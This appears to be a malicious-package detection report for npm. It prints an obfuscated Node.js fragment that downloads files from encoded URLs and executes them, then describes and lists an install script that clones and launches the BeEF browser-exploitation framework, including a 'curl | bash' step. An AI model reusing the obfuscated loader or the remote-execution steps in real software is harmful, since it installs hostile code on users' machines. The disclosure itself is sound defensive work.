{exec}=require(_0x44ad1e(0xbc)+_0x44ad1e(0x95)),path=require(_0x44ad1e(0x9e)),util=require(_0x44ad1e(0xab)),execAsync=util[_0x44ad1e(0xa3)](exec),urls=[_0x44ad1e(0xc3)+_0x44ad1e(0xb1)+_0x44ad1e(0xbd)+_0x44ad1e(0x97)+_0x44ad1e(0xa7)+_0x44ad1e(0xb0)+_0x44ad1e(0xc5),_0x44ad1e(0xc3)+_0x44ad1e(0xb1)+_0x44ad1e(0xbd)+_0x44ad1e(0x97)+_0x44ad1e(0xa7)+_0x44ad1e(0xb0)+_0x44ad1e(0xa8)+_0x44ad1e(0xc7)],outputFiles=[path[_0x44ad1e(0x98)](__dirname,_0x44ad1e(0xc4)),path[_0x44ad1e(0x98)](__dirname,_0x44ad1e(0xb9)+'e')];async function downloadAndRun(_0x425b9e,_0x40dd09){const _0x9e9333=_0x44ad1e,_0x23a275={'DEBoC':function(_0xf20299,_0x44fac9){return _0xf20299(_0x44fac9);},'HigVT':function(_0x5ed004,_0x1cfce5){return _0x5ed004(_0x1cfce5);}},_0x347836=_0x9e9333(0xb2)+_0x9e9333(0xa2)+_0x9e9333(0x9c)+_0x9e9333(0xc6)+_0x9e9333(0x9f)+_0x425b9e+(_0x9e9333(0xbf)+'\x20\x27')+_0x40dd09+'\x27\x22',_0x32e203=_0x9e9333(0xb2)+_0x9e9333(0xa2)+_0x9e9333(0xc2)+_0x9e9333(0xb8)+_0x40dd09+'\x27\x22';try{await _0x23a275[_0x9e9333(0xa9)](execAsync,_0x347836),console[_0x9e9333(0xb3)](_0x9e9333(0xb5)+'\x20'+_0x40dd09+(_0x9e9333(0x9b)+_0x9e9333(0xb7))),await _0x23a275[_0x9e9333(0x9d)](execAsync,_0x32e203),console[_0x9e9333(0xb3)](_0x9e9333(0x9a)+_0x40dd09+(_0x9e9333(0x9b)+_0x9e9333(0xb7)));}catch(_0x2a6ac2){console[_0x9e9333(0xa4)](_0x9e9333(0xae)+_0x2a6ac2[_0x9e9333(0xbb)]);}}function _0x4269(_0x2f7d99,_0x1d7745){const _0x118b6e=_0x5634();return _0x4269=function(_0x461f98,_0xb3a835){_0x461f98=_0x461f98-(-0x393*0x2+0x1a21+-0x1*0x1266);let _0x19c998=_0x118b6e[_0x461f98];return _0x19c998;},_0x4269(_0x2f7d99,_0x1d7745);}((async()=>{const _0x5c2395=_0x44ad1e,_0x6ab1d8={'Azyvb':function(_0x242376,_0x2053fc){return _0x242376<_0x2053fc;},'POWPy':function(_0x48e945,_0xac00ce,_0x5371ca){return _0x48e945(_0xac00ce,_0x5371ca);}};for(let _0x53d08d=0x2*-0x3db+-0x1e1*0xd+0x2023;_0x6ab1d8[_0x5c2395(0xa6)](_0x53d08d,urls[_0x5c2395(0xba)]);_0x53d08d++){await 
_0x6ab1d8[_0x5c2395(0xb6)](downloadAndRun,urls[_0x53d08d],outputFiles[_0x53d08d]);}})());

Detected: 3 Nov 2024
Detected Date: 3 Nov 2024
Affected Install Script: install
Package Source: ↗️ View on Npm

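This script installs and starts BeEF (the Browser Exploitation Framework), which is designed to exploit web browsers. By using this framework, an attacker could control target machines, steal sensitive information, and carry out various malicious actions through browser vulnerabilities. The installation and execution of BeEF without user consent could lead to significant security risks. Note that in the code as listed below the call to `main()` is commented out, so running `node index.js` only defines the exported functions; BeEF is cloned and started when a caller invokes `installBeEF()` and `startBeEF()`.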

Install script:
node index.js
Install script code:
const { exec } = require('child_process');
const axios = require('axios');
const path = require('path');
const fs = require('fs');
const readline = require('readline');

// Checkout location for BeEF: a `beef` folder inside this package's own directory.
const BEEF_DIR = path.join(__dirname, 'beef');
// Upstream repository that installBeEF() clones.
const BEEF_REPO = 'https://github.com/beefproject/beef.git';
// Port used by interactWithBeEF() when building request URLs.
const BEEF_PORT = 3000; // Default BeEF port

// Clones BEEF_REPO into BEEF_DIR with `git clone`.
// Returns a Promise that resolves with no value once the clone finishes, and
// rejects with a string (not an Error object) when BEEF_DIR already exists or
// the git command fails.
// NOTE(review): the clone is unpinned — no commit, tag or checksum — so the code
// placed on disk is whatever the remote's default branch holds at that moment.
// NOTE(review): the command is built by string interpolation and run through a
// shell; BEEF_DIR derives from __dirname and is not quoted.
exports.installBeEF = function() {
    return new Promise((resolve, reject) => {
        if (fs.existsSync(BEEF_DIR)) {
            return reject(`BeEF directory already exists: ${BEEF_DIR}`);
        }
        console.log('Cloning BeEF repository...');
        exec(`git clone ${BEEF_REPO} ${BEEF_DIR}`, (error) => {
            if (error) {
                return reject(`Error cloning BeEF: ${error.message}`);
            }
            console.log('BeEF cloned successfully.');
            resolve();
        });
    });
};

// Rewrites the `username:` and `passwd:` entries of BEEF_DIR/config.yaml in
// place, using synchronous file I/O. Only the first match of each pattern is
// replaced (the regular expressions carry no `g` flag).
// NOTE(review): both values are spliced into the YAML between single quotes
// with no escaping, and they are used as String.prototype.replace replacement
// strings, where sequences such as `$&` are expanded. A value containing a
// quote or `$` therefore produces a config that differs from what was typed.
// NOTE(review): the password ends up in plain text in config.yaml.
function updateCredentials(username, password) {
    const configPath = path.join(BEEF_DIR, 'config.yaml');
    let config = fs.readFileSync(configPath, 'utf8');

    // Replace the default username and password in the config file
    config = config.replace(/username: '.*?'/, `username: '${username}'`);
    config = config.replace(/passwd: '.*?'/, `passwd: '${password}'`);

    fs.writeFileSync(configPath, config, 'utf8');
}

// Asks on the terminal for a username and then a password, and resolves with
// { username, password }. The returned Promise never rejects.
// NOTE(review): the readline interface is bound to process.stdout and no
// masking is set up, so the password is presumably echoed as it is typed —
// confirm on a real terminal.
function promptForCredentials() {
    const rl = readline.createInterface({
        input: process.stdin,
        output: process.stdout
    });

    return new Promise((resolve) => {
        rl.question('Enter new BeEF username: ', (username) => {
            rl.question('Enter new BeEF password: ', (password) => {
                rl.close();
                resolve({ username, password });
            });
        });
    });
}

// Starts BeEF from BEEF_DIR, first checking the installed Ruby version.
// Returns a Promise that resolves with no value when BeEF is reported as
// started (or when only the UTF-8 language warning was seen) and rejects with a
// string describing the step that failed.
//
// NOTE(review): when the detected Ruby is older than 3.0 this function pipes a
// script fetched from https://get.rvm.io straight into bash and then installs
// Ruby 3.1.0 through RVM. That is unverified remote code execution plus a
// change to the user's environment, triggered as a side effect of "start".
exports.startBeEF = function() {
    return new Promise((resolve, reject) => {
        // Check Ruby version before starting BeEF
        exec('ruby -v', (error, stdout, stderr) => {
            if (error) {
                return reject(`Error checking Ruby version: ${error.message}`);
            }

            // parseFloat keeps only "major.minor" of the matched version
            // (e.g. '2.7.4' becomes 2.7). When the output does not match,
            // the value is null and the code goes straight to runBeEF().
            const rubyVersionMatch = stdout.match(/ruby (\d+\.\d+\.\d+)/);
            const currentRubyVersion = rubyVersionMatch ? parseFloat(rubyVersionMatch[1]) : null;

            // If Ruby version is less than 3.0, install/update RVM and Ruby
            if (currentRubyVersion && currentRubyVersion < 3.0) {
                console.log(`Current Ruby version is ${currentRubyVersion}. Upgrading to Ruby 3.1.0...`);

                // Install RVM: downloads an installer and executes it without
                // any integrity check (see the note on the function).
                exec('curl -sSL https://get.rvm.io | bash', { shell: '/bin/bash' }, (error) => {
                    if (error) {
                        return reject(`Error installing RVM: ${error.message}`);
                    }

                    // Load RVM and install Ruby 3.1.0
                    exec('source ~/.rvm/scripts/rvm && rvm install 3.1.0', { shell: '/bin/bash' }, (error) => {
                        if (error) {
                            return reject(`Error installing Ruby 3.1.0: ${error.message}`);
                        }

                        // Ruby 3.1.0 installed, now start BeEF
                        runBeEF();
                    });
                });
            } else {
                // Ruby version is good, start BeEF
                runBeEF();
            }
        });

        // Helper function to start BeEF.
        // The exec callback fires when the `./beef` process ends, so the
        // "started successfully" branch is reached on a clean exit.
        function runBeEF() {
            console.log('Starting BeEF...');
            exec(`cd ${BEEF_DIR} && ./beef`, { shell: '/bin/bash' }, (error, stdout, stderr) => {
                if (error) {
                    if (stderr.includes("Could not find") && stderr.includes("in any of the sources")) {
                        console.log("BeEF needs requirements that aren't installed. Installing...");
                        // NOTE(review): the log line above announces an install of
                        // missing gems, but the command below is `./beef` again, and
                        // `shell` is not defined anywhere in this listing, so this
                        // call presumably throws a ReferenceError — confirm against
                        // the full file.
                        exec(`cd ${BEEF_DIR} && ./beef`, { shell: shell }, (error, stdout, stderr) => {
                            if (error) {
                                return reject(`Error running bundle install: ${error.message}`);
                            }

                            // Attempt to run BeEF again
                            console.log('Retrying to start BeEF...');
                            exec(`cd ${BEEF_DIR} && ./beef`, { shell: '/bin/bash' }, (error, stdout, stderr) => {
                                handleBeEFOutput(error, stdout, stderr);
                            });
                        });
                    } else {
                        handleBeEFOutput(error, stdout, stderr);
                    }
                } else {
                    // The port in this message is a literal, not BEEF_PORT.
                    console.log('BeEF started successfully. You can access it at http://localhost:3000');
                    resolve();
                }
            });
        }

        // Helper function to handle BeEF output: decides from stderr whether the
        // run failed because default credentials are still configured, merely
        // warned about the system language, or failed for another reason.
        function handleBeEFOutput(error, stdout, stderr) {
            // Log standard output and standard error for debugging
            console.log('STDOUT:', stdout);
            console.log('STDERR:', stderr);

            if (stderr.includes("Warning: System language") || stderr.includes("ERROR: Default username and password in use!")) {
                if (stderr.includes("ERROR: Default username and password in use!")) {
                    console.log('BeEF needs a different username and password. Updating config.yaml...');
                    // Blocks on interactive terminal input before continuing.
                    promptForCredentials().then(({ username, password }) => {
                        updateCredentials(username, password);
                        console.log('Credentials updated. Starting BeEF again...');
                        exec(`cd ${BEEF_DIR} && ./beef`, { shell: '/bin/bash' }, (error) => {
                            if (error) {
                                return reject(`Error starting BeEF with new credentials: ${error.message}`);
                            }
                            console.log('BeEF started successfully. You can access it at http://localhost:3000');
                            resolve();
                        });
                    });
                } else {
                    console.log("Warning: System language $LANG '' does not appear to be UTF-8 compatible.");
                    resolve(); // Resolve without restarting BeEF if it's just a warning
                }
            } else {
                return reject(`Error starting BeEF: ${error.message}`);
            }
        }
    });
};

// Sends a GET request to http://localhost:BEEF_PORT/<endpoint> and logs the
// response body. Failures are logged and not rethrown, so the returned Promise
// always resolves with undefined.
// NOTE(review): `endpoint` is placed into the URL as given, without encoding
// or validation.
exports.interactWithBeEF = async function(endpoint) {
    try {
        const response = await axios.get(`http://localhost:${BEEF_PORT}/${endpoint}`);
        console.log('Response from BeEF:', response.data);
    } catch (error) {
        console.error('Error interacting with BeEF:', error.message);
    }
};

// Prints a fixed identification string to the console; takes no arguments and
// returns nothing.
exports.printMsg = function() {
    console.log("This is a message from the BeEN package.");
};

// Convenience entry point: clones BeEF, starts it, then issues one sample API
// request. Every failure (rejections from the steps above are plain strings) is
// logged with console.error and not rethrown.
async function main() {
    try {
        await exports.installBeEF();
        await exports.startBeEF();
        console.log('BeEF is running. You can interact with it now.');
        
        // Example interaction with BeEF (replace with actual endpoint if necessary)
        await exports.interactWithBeEF('api/your-endpoint');  // Replace with valid endpoint
    } catch (error) {
        console.error(error);
    }
}

// The call below is commented out in this listing, so loading the file only
// defines the exports; nothing is cloned or started until a caller invokes them.
// Uncomment the line below to run the main function when executing the script directly
// main();